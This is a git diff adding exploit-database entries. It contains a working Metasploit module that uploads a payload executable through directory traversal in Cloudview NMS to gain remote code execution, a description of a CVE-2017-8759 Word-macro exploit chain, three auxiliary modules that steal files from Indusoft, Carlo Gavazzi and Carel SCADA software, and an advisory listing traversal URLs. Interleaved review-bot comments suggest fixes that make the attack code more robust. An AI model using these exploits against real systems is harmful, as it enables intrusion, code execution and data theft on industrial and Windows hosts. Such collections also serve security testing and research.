diff --git a/platforms/windows/remote/42704.rb b/platforms/windows/remote/42704.rb
new file mode 100755
index 000000000..e57355225
--- /dev/null
+++ b/platforms/windows/remote/42704.rb
@@ -0,0 +1,127 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::WbemExec
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Cloudview NMS File Upload',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability
+ found within Cloudview NMS < 2.00b. The vulnerability
+ is triggered by sending specialized packets to the
+ server with directory traversal sequences (..@ in
+ this case) to browse outside of the web root.
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', '0day' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Cloudview NMS 2.00b on Windows', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Oct 13 2014'))
+
+ register_options([
+ Opt::RPORT(80),
+ OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
+ OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
+ ], self.class )
+ end
+
+ def exploit
+
+ # setup
+ vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
+ exe = generate_payload_exe
+ vbs_content = Msf::Util::EXE.to_exe_vbs(exe)
+ mof_name = rand_text_alpha(rand(10)+5) + '.vbs'
+ mof = generate_mof(mof_name, vbs_name)
+ peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
+
+ print_status("Uploading #{vbs_name} to #{peer}...")
+
+ # logging in to get the "session"
+ @sess = rand(0..2048)
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/MPR=#{@sess}:/",
+ 'version' => '1.1',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'data' => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
+ })
+
+ # This is needed to setup the upload directory
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
+ 'version' => '1.1',
+ })
+
+ # Uploading VBS file
+ data = Rex::MIME::Message.new
+ data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
+ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/MPR=#{@sess}:/",
+ 'version' => '1.1',
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data
+ })
+
+ if res.body =~ /Uploaded file OK/
+ print_good("Uploaded #{vbs_name} successfully!")
+ print_status("Uploading #{mof_name} to #{peer}...")
+
+ # Setting up upload directory
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
+ 'version' => '1.1'
+ })
+
+ # Uploading MOF file
+ data = Rex::MIME::Message.new
+ data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
+ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/MPR=#{@sess}:/",
+ 'version' => '1.1',
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data
+ })
+
+ if res.body =~ /Uploaded file OK/
+ print_good("Uploaded #{mof_name} successfully!")
+ else
+ print_error("Something went wrong...")
+ end
+ else
+ print_error("Something went wrong...")
+ end
+
+ end
+
+end
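Review bot: `[ 'URL', '0day' ]` in the `'References'` array of `initialize` is not a URL and will render as a broken link; either cite the advisory or vendor page or remove the entry. In `exploit`, `res.body =~ /Uploaded file OK/` (twice) dereferences `res` without a nil check, so a connection failure or timeout in `send_request_cgi` raises `NoMethodError` instead of a clear message; the auxiliary modules in this commit (42699.rb, 42705.rb, 42706.rb) guard with `if res and res.code == 200`, and a matching `if res && res.body =~ /Uploaded file OK/` belongs here. Both `else` branches print the same `"Something went wrong..."`, which does not tell the operator which step failed.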
diff --git a/platforms/windows/remote/42711.txt b/platforms/windows/remote/42711.txt
new file mode 100755
index 000000000..91c63ef54
--- /dev/null
+++ b/platforms/windows/remote/42711.txt
@@ -0,0 +1,17 @@
+Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
+
+Running CVE-2017-8759 exploit sample.
+
+Flow of the exploit:
+
+Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe
+
+To test:
+
+Run a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080
+
+If all is good mspaint should run.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip
diff --git a/platforms/windows/webapps/42699.rb b/platforms/windows/webapps/42699.rb
new file mode 100755
index 000000000..dbbd6b285
--- /dev/null
+++ b/platforms/windows/webapps/42699.rb
@@ -0,0 +1,59 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Indusoft Web Studio Directory Traversal',
+ 'Description' => %q{
+ This module exploits a flaw found in Indusoft Web Studio
+ <= 7.1 before SP2 Patch 4. This specific flaw allows users
+ to browse outside of the webroot to download files found
+ on the underlying system
+ },
+ 'Author' => [ 'James Fitts' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'CVE', '2014-0780' ],
+ [ 'ZDI', '14-118/' ],
+ [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02']
+ ],
+ 'DisclosureDate' => 'Jan 18 2013'))
+
+ register_options(
+ [
+ OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
+ OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
+ Opt::RPORT(80)
+ ], self.class )
+ end
+
+ def run
+
+ depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
+ levels = "/" + ("../" * depth)
+
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "/" + levels + datastore['FILE'],
+ })
+
+ if res and res.code == 200 and res.message =~ /Sending file/
+ loot = res.body
+ if not loot or loot.empty?
+ print_status("File from #{rhost}:#{rport} is empty...")
+ return
+ end
+ file = ::File.basename(datastore['FILE'])
+ path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
+ print_status("Stored #{datastore['FILE']} to #{path}")
+ return
+ end
+
+ end
+end
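Review bot: `[ 'ZDI', '14-118/' ]` in `initialize` carries a trailing slash that ends up in the generated ZDI reference link; it should be `[ 'ZDI', '14-118' ]`. `'DisclosureDate' => 'Jan 18 2013'` also looks inconsistent with the 2014 identifiers beside it (CVE-2014-0780, ICSA-14-107-02) and is worth checking against the advisory. In `run`, the `DEPTH` option defaults to 8 but the nil/zero fallback on the first line is 10, so the two defaults disagree; and the `and`/`or`/`not` keyword operators in the conditions are conventionally written `&&`/`||`/`!` in Ruby, a point that applies equally to `run` in 42705.rb and 42706.rb.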
diff --git a/platforms/windows/webapps/42705.rb b/platforms/windows/webapps/42705.rb
new file mode 100755
index 000000000..e000bb02b
--- /dev/null
+++ b/platforms/windows/webapps/42705.rb
@@ -0,0 +1,67 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Carlo Gavazzi Powersoft Directory Traversal',
+ 'Description' => %q{
+ This module exploits a directory traversal vulnerability
+ found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
+ is triggered when sending a specially crafted GET request to the
+ server. The location parameter of the GET request is not sanitized
+ and the sendCommand.php script will automatically pull down any
+ file requested
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
+ ],
+ 'DisclosureDate' => 'Jan 21 2015'))
+
+ register_options(
+ [
+ OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
+ OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
+ OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
+ OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
+ Opt::RPORT(80)
+ ], self.class )
+ end
+
+ def run
+
+ require 'base64'
+
+ credentials = Base64.encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+
+ depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
+ levels = "/" + ("../" * depth)
+
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "#{levels}#{datastore['FILE']}?res=&valid=true",
+ 'headers' => {
+ 'Authorization' => "Basic #{credentials}"
+ },
+ })
+
+ if res and res.code == 200
+ loot = res.body
+ if not loot or loot.empty?
+ print_status("File from #{rhost}:#{rport} is empty...")
+ return
+ end
+ file = ::File.basename(datastore['FILE'])
+ path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
+ print_status("Stored #{datastore['FILE']} to #{path}")
+ return
+ end
+
+ end
+end
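Review bot: `require 'base64'` sits inside `run` rather than at the top of the file next to `require 'msf/core'`; a method-local require is re-evaluated on every run and hides the dependency from anyone reading the header. `Base64.encode64` also appends a newline to its output (and one every 60 characters), so the `Authorization` header value built from it carries an embedded line break; `Base64.strict_encode64` produces a single-line value. Whether the HTTP client strips the trailing newline before sending is not visible here, so I would not rely on it.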
diff --git a/platforms/windows/webapps/42706.rb b/platforms/windows/webapps/42706.rb
new file mode 100755
index 000000000..6d5dfb7f9
--- /dev/null
+++ b/platforms/windows/webapps/42706.rb
@@ -0,0 +1,57 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Carel Pl@ntVisor Directory Traversal',
+ 'Description' => %q{
+ This module exploits a directory traversal vulnerability
+ found in Carel Pl@ntVisor <= 2.4.4. The vulnerability is
+ triggered by sending a specially crafted GET request to the
+ victim server.
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2011-3487' ],
+ [ 'BID', '49601' ],
+ ],
+ 'DisclosureDate' => 'Jun 29 2012'))
+
+ register_options(
+ [
+ OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
+ OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
+ Opt::RPORT(80)
+ ], self.class )
+ end
+
+ def run
+
+ depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
+ levels = "/" + ("..%5c" * depth)
+
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "#{levels}#{datastore['FILE']}",
+ })
+
+ if res and res.code == 200
+ loot = res.body
+ if not loot or loot.empty?
+ print_status("File from #{rhost}:#{rport} is empty...")
+ return
+ end
+ file = ::File.basename(datastore['FILE'])
+ path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
+ print_status("Stored #{datastore['FILE']} to #{path}")
+ return
+ end
+
+ end
+end
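Review bot: `'DisclosureDate' => 'Jun 29 2012'` in `initialize` does not match the advisory this commit adds alongside it, 42707.txt, which is dated 13 Sep 2011 and describes the same Carel PlantVisor <= 2.4.4 traversal (CVE-2011-3487); one of the two dates appears to be wrong and should be checked. The `'References'` list could also credit that advisory so the module records where the finding came from. `run` otherwise mirrors 42699.rb and 42705.rb, including the `and`/`or`/`not` keyword operators noted there.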
diff --git a/platforms/windows/webapps/42707.txt b/platforms/windows/webapps/42707.txt
new file mode 100755
index 000000000..2114b7751
--- /dev/null
+++ b/platforms/windows/webapps/42707.txt
@@ -0,0 +1,76 @@
+#######################################################################
+
+ Luigi Auriemma
+
+Application: Carel PlantVisor
+ http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
+Versions: <= 2.4.4
+Platforms: Windows
+Bug: directory traversal
+Exploitation: remote
+Date: 13 Sep 2011
+Author: Luigi Auriemma
+ e-mail: aluigi@autistici.org
+ web: aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bug
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+From vendor's homepage:
+"PlantVisor Enhanced is monitoring and telemaintenance software for
+refrigeration and air-conditioning systems controlled by CAREL
+instruments."
+
+
+#######################################################################
+
+======
+2) Bug
+======
+
+
+CarelDataServer.exe is a web server listening on port 80.
+
+The software is affected by a directory traversal vulnerability that
+allows to download the files located on the disk where it's installed.
+Both slash and backslash and their HTTP encoded values are supported.
+
+
+#######################################################################
+
+===========
+3) The Code
+===========
+
+
+http://SERVER/..\..\..\..\..\..\boot.ini
+http://SERVER/../../../../../../boot.ini
+http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
+http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
+
+
+#######################################################################
+
+======
+4) Fix
+======
+
+
+No fix.
+
+
+#######################################################################
\ No newline at end of file